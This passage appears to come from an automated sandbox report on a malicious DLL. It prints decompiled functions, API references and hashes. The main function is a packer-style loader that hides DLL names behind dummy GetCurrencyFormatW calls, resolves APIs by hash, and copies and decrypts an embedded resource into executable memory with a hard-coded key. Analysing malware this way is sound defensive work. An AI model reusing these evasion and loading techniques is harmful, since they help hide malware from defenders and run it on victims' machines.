Instruction Fuzzy Hash: 83D09E75388202AEF619C740CD97FD5B754A755706F11800CF346EE5D1CBA651558B14

Uniqueness

Uniqueness Score: -1.00%

Function 10001DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001DB6(signed int _a4, intOrPtr _a8) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  !(_a8 - 1) & _a4;
			}

0x10001de8

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001DCE

Strings

xadqsavcbdfewescGADW, xrefs: 10001DBB
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DC2

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction ID: 693cd55018ed01a535ded29b615326f2d298561c8c1b69a974d3bac9f79f4422
Opcode Fuzzy Hash: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
Instruction Fuzzy Hash: CED0C9753887017AFA09D741DE97FC6B750E795B06F019008F749EE5D1CBB890408F15

Uniqueness

Uniqueness Score: -1.00%

Function 10001E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10001E20(void* _a4, intOrPtr _a8) {
				signed int _t3;

				_t3 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				asm("sbb eax, eax");
				return _t3 *  *0x100440cc + _a8 + 1;
			}

0x10001e38
0x10001e4d
0x10001e50

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E38

Strings

xadqsavcbdfewescGADW, xrefs: 10001E25
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E2C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction ID: 3fdeccdcda24fa04b64c34d0073cfd5bdbdd3e77499752cdea2f7536024f9e24
Opcode Fuzzy Hash: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
Instruction Fuzzy Hash: 2DD0C931298311BAE2059B60CD86F86B794E756B07F01C514F345EE4D1C7B090848A25

Uniqueness

Uniqueness Score: -1.00%

Function 10003854 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003854(void* __ecx) {

				E1000EE6D(__ecx, 0x3e9, "Mundo Hola");
				return SendMessageA( *(__ecx + 0xe8), 0x143, 0, "Hola Mundo");
			}

0x10003861
0x1000387f

APIs

Part of subcall function 1000EE6D: SetDlgItemTextA.USER32 ref: 1000EE7E

SendMessageA.USER32 ref: 10003878

Strings

Hola Mundo, xrefs: 10003866
Mundo Hola, xrefs: 10003855

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ItemMessageSendText
String ID: Hola Mundo$Mundo Hola
API String ID: 77679052-617527613
Opcode ID: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction ID: 1811b1191abaef19ada81be914ca39904a3dc6a32a47f6b2494c466348ef455e
Opcode Fuzzy Hash: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
Instruction Fuzzy Hash: D2C080301403A07FF5226250FC06FCA5910CB05753F008501730D7D0D18B5139804640

Uniqueness

Uniqueness Score: -1.00%

Function 10011382 Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E10011382(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E10004E6E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10048670 == 0) {
					_t4 = E1001135E();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10048828 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10048810);
					if( *_t15 == 0) {
						_t4 = 0x10048678 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10048810);
				}
				EnterCriticalSection(0x10048678 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction ID: 2a1b714fc97c26e45b6e87192a60087c5aec0faa5666cee140badcbafd2b3ba5
Opcode Fuzzy Hash: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction Fuzzy Hash: BFF0F6735001288FD6409F54CC8475DB7AAFB82395F56482AE1508A056CF31D681C769

Uniqueness

Uniqueness Score: -1.00%

Function 100105F0 Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100105F0(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10048600
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 100105F9
TlsGetValue.KERNEL32(100485E4,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001060E
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 10010624
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001062F

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction ID: 62d6a443bb2e53cdd0c433372c742529333c02fcab520335ef35924ea7a93314
Opcode Fuzzy Hash: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction Fuzzy Hash: C2F0127A3005109FD321CF64CC8884A73E9FFC839171A8866F8819B123DB71F895CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 6064, Parent PID: 796COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	15.6%
Signature Coverage:	0%
Total number of Nodes:	538
Total number of Limit Nodes:	17

Executed Functions

Function 100042F6 Relevance: 133.6, APIs: 46, Strings: 30, Instructions: 598
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E100042F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v4;
				int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				int _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				int _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				struct HINSTANCE__* _v80;
				signed int _v84;
				int _v88;
				void* _v92;
				signed int _t177;
				int _t183;
				int _t185;
				intOrPtr _t277;
				struct HRSRC__* _t278;
				long _t280;
				signed int _t285;
				long _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t298;
				short* _t312;
				void* _t314;
				void* _t321;
				short* _t326;
				signed int _t330;
				void* _t334;
				intOrPtr _t338;

				_t322 = __esi;
				_t319 = __edi;
				_t318 = __edx;
				_t314 = __ecx;
				_t311 = __ebx;
				_t330 =  &_v92;
				_t177 =  *0x10045580; // 0x2ef01728
				_v4 = _t177 ^ _t330;
				_v80 = _a4;
				_t336 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t183 = 1;
				} else {
					_t185 = E100036FA(__ebx, __esi, _t336);
					_t337 = _t185;
					if(_t185 != 0) {
						_push(0x10036c38);
						E10020633(__ebx, __edx, __edi, __esi, __eflags);
						_t183 = 0;
						__eflags = 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_t326 = L"xadqsavcbdfewescGADW";
						_t312 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						 *0x100440cc = _t185;
						 *0x100440d0 = _t185;
						 *0x100440d4 = _t185;
						 *0x100440dc = _t185;
						 *0x100440d8 = _t185;
						 *0x100440e0 = _t185;
						 *0x100440e4 = _t185;
						_v32 = 0x417;
						_v30 = 0x44e;
						_v28 = 0x451;
						_v26 = 0x43a;
						_v24 = 0x416;
						_v22 = 0x401;
						_v20 = 0x448;
						_v18 = 0x428;
						_v16 = 0x44e;
						_v14 = 0x41a;
						_v12 = 0x41f;
						_v10 = 0x441;
						_v8 = _t185;
						_v76 = 0x42a;
						_v74 = 0x442;
						_v72 = 0x423;
						_v70 = 0x44e;
						_v68 = 0x448;
						_v66 = 0x44f;
						_v64 = 0x42c;
						_v62 = 0x43b;
						_v60 = 0x442;
						_v58 = _t185;
						_v56 = 0x442;
						_v54 = 0x44a;
						_v52 = 0x43f;
						_v50 = 0x448;
						_v48 = 0x423;
						_v46 = 0x437;
						_v44 = 0x43d;
						_v42 = 0x43a;
						_v40 = 0x451;
						_v38 = 0x442;
						_v36 = _t185;
						 *((short*)(_t330 + 0x64 + GetCurrencyFormatW(_t185, 0x11d4, _t312, _t185, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6b;
						 *((short*)(_t330 + 0x66 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x60 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x72;
						 *((short*)(_t330 + 0x6a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6e;
						 *((short*)(_t330 + 0x6c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x6e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x70 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x33;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x32;
						 *((short*)(_t330 + 0x74 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x2e;
						 *((short*)(_t330 + 0x76 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x64;
						 *((short*)(_t330 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x38 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6e;
						 *((short*)(_t330 + 0x3a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x74;
						 *((short*)(_t330 + 0x3c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x3e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x42 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x44 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x4c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6d;
						 *((short*)(_t330 + 0x4e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x73;
						 *((short*)(_t330 + 0x50 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x76;
						 *((short*)(_t330 + 0x52 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x63;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x72;
						 *((short*)(_t330 + 0x56 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x74;
						 *((short*)(_t330 + 0x58 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x5a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x64;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						_v92 = E10001534(_t314, _t337, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2,  &_v32);
						_v84 = E10001534(_t314, _t337, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39,  &_v76);
						_v88 = E10001534(_t314, _t337, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82,  &_v56);
						 *0x10046a74 = E10001688(_t254, 0x4cba7001);
						 *0x10046a70 = E10001688(_v88, 0x4e026ffd);
						 *0x10046a64 = E10001688(_v88, 0xc066615c);
						 *0x10046a54 = E10001688(_v88, 0xdad370ab);
						 *0x10046a68 = E10001688(_v88, 0x3762b189);
						 *0x10046a80 = E10001688(_v88, 0x4ec2add7);
						 *0x10046a2c = E10001688(_v88, 0x4e6ab1d2);
						 *0x10046a30 = E10001688(_v92, 0x626d0ab3);
						 *0x10046a3c = E10001688(_v92, 0x491ca2f6);
						 *0x10046a58 = E10001688(_v92, 0x74860909);
						 *0x10046a50 = E10001688(_v92, 0x13c17412);
						 *0x10046a4c = E10001688(_v92, 0x4a42047a);
						 *0x10046a5c = E10001688(_v92, 0x4d093b11);
						 *0x10046a84 = E10001688(_v92, 0x1f051606);
						 *0x10046a40 = E10001688(_v92, 0xdd86ddbc);
						 *0x10046a38 = E10001688(_v84, 0x3ed46385);
						 *0x10046a7c = E10001688(_v92, 0x417f6a7d);
						 *0x10046a78 = E10001688(_v92, 0xb88a2b15);
						 *0x10046a60 = E10001688(_v92, 0x3fbe89a1);
						 *0x10046a34 = E10001688(_v92, 0xbcc9930d);
						 *0x10046a6c = E10001688(_v92, 0x2c4bdae9);
						 *0x10046a48 = E10001688(_v92, 0x640963da);
						_t277 = E10001688(_v92, 0xfa5d867);
						_t334 = _t330 + 0x100;
						 *0x10046a44 = _t277; // executed
						_t278 = FindResourceW(_v80, 0x3275, 0x10036c5c); // executed
						_v84 = _t278;
						_v92 = LoadResource(_v80, _t278);
						_t280 = SizeofResource(_v80, _v84);
						_push(0x22b9);
						_push(_t326);
						_v88 = _t280;
						_t338 =  *0x10046a3c; // 0x76c866e0
						_push(0);
						_push(_t312);
						_push(0x11d4);
						_push(0);
						if(_t338 == 0) {
							_v84 = GetCurrencyFormatW() *  *0x100440d0 + 0x2000;
							_t285 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9);
							_t291 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84;
							__eflags = _t291;
							_t292 = VirtualAlloc(0, _v88, _t291, _t285 *  *0x100440cc + 0x40);
						} else {
							_v84 = GetCurrencyFormatW() *  *0x100440e0 + 0x2000;
							_t292 =  *0x10046a3c(0xffffffff, 0, _v88, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 + 0x40, 0); // executed
						}
						_t313 = _v88;
						_t324 = _t292;
						memcpy(_t292, _v92, _v88);
						_t294 = malloc(0x4708); // executed
						_t321 = _t294;
						E100018D8(0xed9e0cf, 0x96c3a441, 0x245e78a3, _t321, "u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(", 0x3f);
						E10001B36(0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t321, _t292, _v88);
						 *0x10046a64(_t321);
						_t298 = E100042CA(_t324, _t313);
						_t330 = _t334 + 0x4c;
						 *0x10046a8c = _t298;
						 *0x10046a88(_v80);
						_pop(_t319);
						_t322 = 1;
						_t311 = 0;
						goto L6;
					}
				}
				return E1001FBB5(_t183, _t311, _v4 ^ _t330, _t318, _t319, _t322);
			}

APIs

Part of subcall function 100036FA: _malloc.LIBCMT ref: 10003700

GetCurrencyFormatW.KERNEL32 ref: 10004452
GetCurrencyFormatW.KERNEL32 ref: 1000446E
GetCurrencyFormatW.KERNEL32 ref: 1000448A
GetCurrencyFormatW.KERNEL32 ref: 100044A6
GetCurrencyFormatW.KERNEL32 ref: 100044C2
GetCurrencyFormatW.KERNEL32 ref: 100044DE
GetCurrencyFormatW.KERNEL32 ref: 100044FA
GetCurrencyFormatW.KERNEL32 ref: 10004516
GetCurrencyFormatW.KERNEL32 ref: 10004532
GetCurrencyFormatW.KERNEL32 ref: 1000454E
GetCurrencyFormatW.KERNEL32 ref: 1000456A
GetCurrencyFormatW.KERNEL32 ref: 10004586
GetCurrencyFormatW.KERNEL32 ref: 100045A2
GetCurrencyFormatW.KERNEL32 ref: 100045BE
GetCurrencyFormatW.KERNEL32 ref: 100045DA
GetCurrencyFormatW.KERNEL32 ref: 100045F6
GetCurrencyFormatW.KERNEL32 ref: 10004612
GetCurrencyFormatW.KERNEL32 ref: 1000462E
GetCurrencyFormatW.KERNEL32 ref: 1000464A
GetCurrencyFormatW.KERNEL32 ref: 10004666
GetCurrencyFormatW.KERNEL32 ref: 10004682
GetCurrencyFormatW.KERNEL32 ref: 1000469E
GetCurrencyFormatW.KERNEL32 ref: 100046BA
GetCurrencyFormatW.KERNEL32 ref: 100046D6
GetCurrencyFormatW.KERNEL32 ref: 100046F2
GetCurrencyFormatW.KERNEL32 ref: 1000470E
GetCurrencyFormatW.KERNEL32 ref: 1000472A
GetCurrencyFormatW.KERNEL32 ref: 10004746
GetCurrencyFormatW.KERNEL32 ref: 10004762
GetCurrencyFormatW.KERNEL32 ref: 1000477E
GetCurrencyFormatW.KERNEL32 ref: 1000479A

Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 1000155F
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015B5
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015DF
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001606
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001639
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001668

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016B0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016D0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016E8
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001710
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001731
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001757
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001770
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 1000179B

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017B7
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017DF
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017FA
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001826
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001844
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001879

